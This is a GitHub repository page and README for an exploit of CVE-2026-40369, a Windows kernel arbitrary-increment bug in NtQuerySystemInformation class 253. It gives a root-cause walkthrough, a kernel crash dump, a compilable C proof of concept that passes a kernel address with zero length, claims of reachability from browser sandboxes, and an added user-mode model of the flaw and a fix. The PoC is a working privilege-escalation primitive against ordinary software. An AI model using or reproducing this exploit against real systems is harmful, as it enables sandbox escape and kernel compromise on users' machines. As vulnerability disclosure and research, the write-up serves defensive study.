# orinimron123/CVE-2026-40369-EXPLOIT

Full exploit code for CVE-2026-40369, a Windows kernel arbitrary write vulnerability that allows browser sandbox escape from every browser's renderer process sandbox.

- **Language:** C++
- **Stars:** 229 (4 in the last 7 days, 101 in the last 30 days)
- **Forks:** 52
- **Watchers:** 4
- **Open issues:** 0
- **Default branch:** main
- **Last updated:** 2026-06-12 04:01:22

**Site summary (translated from Chinese):** This project provides full exploit code for CVE-2026-40369, a Windows kernel arbitrary write vulnerability that allows escape from the renderer process sandbox of all browsers. Its core is a call to `NtQuerySystemInformation` (class 253) that increments an arbitrary kernel address, bypassing the sandbox protections of Chrome and other browsers. Technical characteristics include 100% deterministic exploit reliability and the option of combining it with a prefetch tool to bypass KASLR. It is intended for security researchers doing vulnerability analysis and testing, and for internal enterprise security teams assessing system security.

---

## README

## Full Blog - https://pwn2nimron.com/blog

# CVE-2026-40369: Arbitrary Kernel Address Increment via NtQuerySystemInformation (Class 253)

## Summary
- **Type:** Arbitrary kernel write (increment), a privilege escalation primitive
- **Component:** ntoskrnl.exe, `ExpGetProcessInformation`
- **Trigger:** `NtQuerySystemInformation(SystemProcessInformationExtension, kernelAddr, 0, &needed)`
- **Impact:** Arbitrary kernel address increment (write primitive) from any unprivileged process
- **Reachable from Chrome sandbox:** YES (NtQuerySystemInformation is not blocked)
- **Windows versions:** Windows 11 24H2-25H2
- **Exploit reliability:** 100% deterministic
- **KASLR bypass:** can be chained with the prefetch tool, https://github.com/exploits-forsale/prefetch-tool

## Root Cause

`ExpGetProcessInformation` is called by `ExpQuerySystemInformation` for info classes 5 (SystemProcessInformation), 0x39, 0x94, 0xFC, and **0xFD (253 = SystemProcessInformationExtension)**.

The call site at `ExpQuerySystemInformation+0xD7A`:
```c
// Cases 5, 0x39, 0x94, 0xFC, 0xFD all share this call:
result = ExpGetProcessInformation((unsigned int *)userBuffer, bufferLength, &returnSize, NULL, infoClass);
```

`userBuffer` is whatever the caller passed as `SystemInformation`. The only validation it receives is the `ProbeForWrite(userBuffer, bufferLength, ...)` call in `ExpQuerySystemInformation`, and `ProbeForWrite` does nothing when the length is 0 (see the Exploitability Assessment below). A caller that "probes for the required buffer size" with `Length=0` can therefore hand a NULL or kernel pointer straight through. For class 253 the function then does this:

```c
// ExpGetProcessInformation, simplified:
__int64 ExpGetProcessInformation(unsigned int *buffer, unsigned int length, ..., int infoClass)
{
    v91 = buffer;  // caller-supplied pointer; unprobed when length == 0

    if (infoClass == 252) {
        v86 = v91;  // class 252 uses v86
        // ...
    } else {
        v86 = NULL;
        if (infoClass == 253) {
            v95 = v91;  // BUG: copied without any NULL check or user-range check
            goto LABEL_11;
        }
        // class 5 path - uses v81, doesn't touch v95
    }
    v95 = NULL;  // class 252 path falls through here

LABEL_11:
    // ... process iteration loop ...
    while (NextProcess) {
        if (infoClass == 253) {
            ++*v95;          // write to the caller-controlled address
            v95[1] += ...;   // second write, same buffer
            v95[2] += ...;   // third write, same buffer
        }
        // class 5/252 paths handle a NULL buffer correctly
    }
}
```

For class 253, `v95` is set to the buffer pointer without any check. The process iteration loop then increments a counter at `*v95` once per process. With a NULL buffer that is a NULL pointer dereference in kernel mode and a BSOD; with an attacker-chosen kernel address it is a write to that address, or a bugcheck if the address is not mapped writable (as in the crash below, where the target was `ffff800041424344`).

Classes 5 and 252 handle a NULL buffer correctly because they use different variables (`v81`/`v86`) and check them before dereferencing.

## Crash Details

```
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffff800041424344, memory referenced.
Arg2: 0000000000000002, X64: bit 0 set if the fault was due to a not-present PTE.
	bit 1 is set if the fault was due to a write, clear if a read.
	bit 3 is set if the processor decided the fault was due to a corrupted PTE.
	bit 4 is set if the fault was due to attempted execute of a no-execute PTE.
	- ARM64: bit 1 is set if the fault was due to a write, clear if a read.
	bit 3 is set if the fault was due to attempted execute of a no-execute PTE.
Arg3: fffff803a06db22e, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 0000000000000002, (reserved)

IP_IN_PAGED_CODE: 
nt!ExpGetProcessInformation+42e
fffff803`a06db22e ff03            inc     dword ptr [rbx]

STACK_TEXT:  
*** WARNING: Unable to verify checksum for poc.exe
Unable to load image C:\Users\vm\poc.exe, Win32 error 0n2
ffffd380`d4dc52f8 fffff803`a01b2d82     : ffffd380`d4dc5378 00000000`00000001 00000000`00000100 fffff803`a02c4801 : nt!DbgBreakPointWithStatus
ffffd380`d4dc5300 fffff803`a01b22ac     : 00000000`00000003 ffffd380`d4dc5460 fffff803`a02c4970 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
ffffd380`d4dc5360 fffff803`a00fba97     : 00000000`00000000 fffff803`9fe46273 00000000`00000000 00000000`00000000 : nt!KeBugCheck2+0xb2c
ffffd380`d4dc5af0 fffff803`9fe29dc0     : 00000000`00000050 ffff8000`41424344 00000000`00000002 ffffd380`d4dc5d90 : nt!KeBugCheckEx+0x107
ffffd380`d4dc5b30 fffff803`9fe16d96     : fffff803`a0bd9680 ffff8000`00000000 ffff8000`41424344 0000007f`fffffff8 : nt!MiSystemFault+0x850
ffffd380`d4dc5c20 fffff803`a02b9ecb     : 00000000`00000000 00000000`0000000f 00000000`00000000 0000000c`00000000 : nt!MmAccessFault+0x646
ffffd380`d4dc5d90 fffff803`a06db22e     : 00000000`00000001 00000000`00000001 00000000`c0000004 00000000`000000fd : nt!KiPageFault+0x38b
ffffd380`d4dc5f20 fffff803`a06dcfbf     : 00000000`00000000 00000000`00000000 ffff8701`f54e4118 00000000`00000000 : nt!ExpGetProcessInformation+0x42e
ffffd380`d4dc6540 fffff803`a06e1061     : 00000000`00001000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ExpQuerySystemInformation+0xd7f
ffffd380`d4dc6aa0 fffff803`a02be355     : 00000285`00b20000 ffff8701`f54e4080 ffff8701`f54e4080 00000000`00000000 : nt!NtQuerySystemInformation+0x91
ffffd380`d4dc6ae0 00007ffd`5bc82154     : 00007ff6`f01c10ef 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 : nt!KiSystemServiceCopyEnd+0x25
000000e8`7679faf8 00007ff6`f01c10ef     : 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 00000285`00da4eb5 : ntdll!NtQuerySystemInformation+0x14
000000e8`7679fb00 00007ff6`f01c1374     : 00000000`00000000 00000285`00da3ab0 00000000`00000000 00000000`00000000 : poc+0x10ef
000000e8`7679fb30 00007ffd`5a5ae8d7     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : poc+0x1374
000000e8`7679fb70 00007ffd`5bbac48c     : 00000000`00000000 00000000`00000000 000004f0`fffffb30 000004d0`fffffb30 : KERNEL32!BaseThreadInitThunk+0x17
000000e8`7679fba0 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2c
```

## Reproduction

Minimal reproducer (unprivileged, no special tokens needed). It deliberately targets an unmapped kernel address, so on an affected build it bugchecks the machine; run it in a VM.
```c
/**
 * poc.c: NtQuerySystemInformation class 253 arbitrary kernel increment PoC
 *
 * Demonstrates arbitrary kernel DWORD increment via ProbeForWrite bypass.
 * Passes a kernel address as the output buffer with Length=0, causing
 * ExpGetProcessInformation to increment DWORDs at the target address
 * without validation.
 *
 * Build: cl /W4 /O2 poc.c /Fe:poc.exe /link ntdll.lib
 */

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ntdll.lib")

typedef long NTSTATUS;

#define SystemProcessInformationExtension 253

/* NtQuerySystemInformation is resolved at run time, so no import library or
 * winternl.h prototype is required. */
typedef NTSTATUS (NTAPI *PNtQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

int main(void)
{
    PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");

    if (!pNtQSI) {
        printf("[-] Failed to resolve NtQuerySystemInformation\n");
        return 1;
    }

    /* Kernel-space address. It is the pointer the kernel will write through;
     * nothing in user mode ever dereferences it. */
    PVOID target = (PVOID)0xffff800041424344ULL;

    printf("[*] NtQuerySystemInformation class 253 arbitrary kernel increment PoC\n");
    printf("[*] Target kernel address: %p\n", target);
    printf("[*] Will write:\n");
    printf("      [target+0] += num_processes  (DWORD increment)\n");
    printf("      [target+4] += total_threads  (DWORD add)\n");
    printf("      [target+8] += total_handles  (DWORD add)\n");
    printf("\n");
    printf("[!] This WILL bugcheck if the address is not mapped writable memory.\n");
    printf("[*] Press Enter to trigger...\n");
    getchar();

    ULONG needed = 0;
    NTSTATUS status = pNtQSI(
        SystemProcessInformationExtension,
        target,   /* kernel address: ProbeForWrite is skipped because Length=0 */
        0,        /* Length=0 bypasses ProbeForWrite entirely */
        &needed
    );

    /* Expected on an affected build (if the target was writable):
     * STATUS_INFO_LENGTH_MISMATCH (0xC0000004), with the three DWORDs already bumped. */
    printf("[*] NtQuerySystemInformation returned: 0x%08lX\n", status);
    printf("[*] Required length: %lu\n", needed);
    printf("[+] Done. If you see this, the writes succeeded without bugcheck.\n");

    return 0;
}

```

## Exploitability Assessment: Arbitrary Kernel Write

### The ProbeForWrite Bypass

`ExpQuerySystemInformation` calls `ProbeForWrite(buffer, Length, alignment)` before dispatching.
**ProbeForWrite with Length=0 is a complete no-op**: the entire function body is gated by `if (Length)`.

So `NtQuerySystemInformation(253, arbitraryKernelAddr, 0, &needed)` passes an unvalidated kernel pointer through to `ExpGetProcessInformation`.

### The Write Primitive

For each process on the system, the function executes:
```c
v95 = userBuffer;  // attacker-controlled pointer, NOT validated for class 253 with Length=0

// For EACH process:
++*v95;              // *(uint32*)(addr+0) += 1
v95[1] += threadCnt; // *(uint32*)(addr+4) += process_active_thread_count
v95[2] += handleCnt; // *(uint32*)(addr+8) += process_handle_count
```

This gives:
- **addr+0:** incremented by 1 per process, so the total added is the number of processes on the system
- **addr+4:** the sum of all process thread counts
- **addr+8:** the sum of all process handle counts

Note that the primitive is an add, not a store: one call adds the current process count to the DWORD at +0, and it always touches the two DWORDs at +4 and +8 as well, so a target has to tolerate those adjacent writes.

### Why the writes happen despite Length=0

`ExpGetProcessInformation` checks `if (length < 12)` and sets STATUS_INFO_LENGTH_MISMATCH,
but **does not return early**. It stores the error status and continues into the process
iteration loop, executing the writes to `v95` for every process before finally returning
the error status. The crash stack above is consistent with this: the `nt!KiPageFault` frame already carries `c0000004` (STATUS_INFO_LENGTH_MISMATCH) and `fd` (the info class) when the faulting `inc dword ptr [rbx]` executes.

### Works From the Chrome, Edge and Firefox Sandboxes

Fully reachable:
- NtQuerySystemInformation is NOT blocked by win32k lockdown (it is an ntoskrnl syscall, not a win32k one)
- The restricted token does NOT prevent this syscall
- Untrusted integrity level does NOT prevent this syscall

![alt text](image.png)

## Credit
Found and written by Ori Nimron (@orinimron123)
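To make the probe-then-dispatch control flow from the Root Cause and Exploitability Assessment sections concrete, here is an added user-mode model of it, written for this page; it is not the repository's exploit and not Microsoft's code. The process table, the two modelled memory mappings, the `resolve` helper, the `USER_PROBE_ADDRESS` constant and the "fixed" variant are constructed assumptions (the fix shown is one plausible fix, not the vendor patch); the NTSTATUS values are the real ones. It shows, side by side, the skipped probe at `Length=0`, the writes that happen anyway while STATUS_INFO_LENGTH_MISMATCH is being returned, the same call being caught once `Length` is non-zero, and a variant that returns before touching the buffer.

```c
/* Added example: user-mode model of ExpQuerySystemInformation -> ProbeForWrite ->
 * ExpGetProcessInformation for class 253. Nothing here touches a real kernel. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define STATUS_SUCCESS              0x00000000L
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004L   /* real NTSTATUS, also visible in the crash stack */
#define STATUS_ACCESS_VIOLATION     0xC0000005L   /* real NTSTATUS, what a failed probe raises */
#define SystemProcessInformationExtension 253

/* Constructed stand-in for the kernel's process list (thread and handle counts). */
typedef struct { const char *name; uint32_t threads; uint32_t handles; } fake_eprocess;
static const fake_eprocess g_procs[] = {
    { "System", 140, 2100 }, { "csrss", 12, 600 }, { "chrome", 41, 900 },
};
#define NPROCS (sizeof g_procs / sizeof g_procs[0])

/* Modelled address space: the page's target address in kernel space, one user page,
 * and the x64 user/kernel boundary used by ProbeForWrite (MmUserProbeAddress). */
#define KERNEL_TARGET      0xFFFF800041424344ULL
#define USER_BUFFER        0x0000020000000000ULL
#define USER_PROBE_ADDRESS 0x00007FFFFFFF0000ULL
static uint32_t g_kernel_mem[3], g_user_mem[3];
static int g_bugcheck;   /* set when the model dereferences an unmapped address */

static uint32_t *resolve(uint64_t addr)
{
    if (addr == KERNEL_TARGET) return g_kernel_mem;
    if (addr == USER_BUFFER)   return g_user_mem;
    return NULL;                       /* unmapped: a real kernel bugchecks here */
}
static int model_bugchecked(void) { return g_bugcheck; }

/* ProbeForWrite as the write-up describes it: the whole body is gated on Length,
 * so Length == 0 never looks at the pointer at all. */
static long probe_for_write(uint64_t addr, uint32_t length)
{
    if (length == 0) return STATUS_SUCCESS;
    if (addr + length < addr || addr + length > USER_PROBE_ADDRESS) return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

typedef long (*getproc_fn)(uint32_t *, uint32_t, uint32_t *, int);

/* Vulnerable shape: the length error is recorded, but the loop still runs
 * against the unchecked pointer (+0 += 1, +4 += threads, +8 += handles per process). */
static long exp_get_process_information_vuln(uint32_t *buf, uint32_t length, uint32_t *ret, int cls)
{
    long status = STATUS_SUCCESS;
    uint32_t *v95 = (cls == SystemProcessInformationExtension) ? buf : NULL; /* BUG: no validation */
    if (length < 12) status = STATUS_INFO_LENGTH_MISMATCH;                  /* no early return */
    for (size_t i = 0; i < NPROCS; i++) {
        if (cls != SystemProcessInformationExtension) continue;
        if (!v95) { g_bugcheck = 1; return status; }   /* models PAGE_FAULT_IN_NONPAGED_AREA */
        ++v95[0];
        v95[1] += g_procs[i].threads;
        v95[2] += g_procs[i].handles;
    }
    *ret = 12;                                           /* illustrative required size */
    return status;
}

/* Hardened shape (assumed fix): bail out before any dereference when the buffer
 * was too short to have been probed; a length >= 12 buffer has passed the probe. */
static long exp_get_process_information_fixed(uint32_t *buf, uint32_t length, uint32_t *ret, int cls)
{
    if (length < 12) { *ret = 12; return STATUS_INFO_LENGTH_MISMATCH; }
    return exp_get_process_information_vuln(buf, length, ret, cls);
}

/* Model of the syscall: reset the modelled memory, probe, dispatch, then copy the
 * three DWORDs at the target into out[] so the caller can see what was written. */
static long nt_query_system_information(getproc_fn impl, uint64_t buf_addr, uint32_t length, uint32_t out[3])
{
    uint32_t needed = 0, *m;
    memset(g_kernel_mem, 0, sizeof g_kernel_mem);
    memset(g_user_mem, 0, sizeof g_user_mem);
    g_bugcheck = 0;
    long status = probe_for_write(buf_addr, length);
    if (status == STATUS_SUCCESS)
        status = impl(resolve(buf_addr), length, &needed, SystemProcessInformationExtension);
    m = resolve(buf_addr);
    if (m) memcpy(out, m, sizeof g_kernel_mem); else memset(out, 0, sizeof g_kernel_mem);
    return status;
}

int main(void)
{
    uint32_t out[3];
    long st = nt_query_system_information(exp_get_process_information_vuln, KERNEL_TARGET, 0, out);
    printf("vuln,  kernel target, Length=0 : 0x%08lX  mem=[%u,%u,%u]\n", st, out[0], out[1], out[2]);
    st = nt_query_system_information(exp_get_process_information_vuln, KERNEL_TARGET, 12, out);
    printf("vuln,  kernel target, Length=12: 0x%08lX  mem=[%u,%u,%u]\n", st, out[0], out[1], out[2]);
    st = nt_query_system_information(exp_get_process_information_fixed, KERNEL_TARGET, 0, out);
    printf("fixed, kernel target, Length=0 : 0x%08lX  mem=[%u,%u,%u]\n", st, out[0], out[1], out[2]);
    st = nt_query_system_information(exp_get_process_information_vuln, USER_BUFFER, 0, out);
    printf("vuln,  user buffer,   Length=0 : 0x%08lX  mem=[%u,%u,%u]\n", st, out[0], out[1], out[2]);
    return 0;
}
```

Build with `cc -std=c99 -Wall model.c -o model` and run it. The first case is the write-up's claim in miniature: the probe is skipped because `Length` is 0, the call returns STATUS_INFO_LENGTH_MISMATCH, and the three DWORDs at the modelled kernel address have nevertheless been bumped by the process count, the thread total and the handle total. The same pointer with `Length=12` is rejected by the probe before dispatch, and the hardened variant returns on the length check before the loop ever runs. The last case, a user-mode buffer with `Length=0`, is the harmless form of the same call in this model; whether an affected host behaves identically is something to verify on a test VM, not something the model establishes.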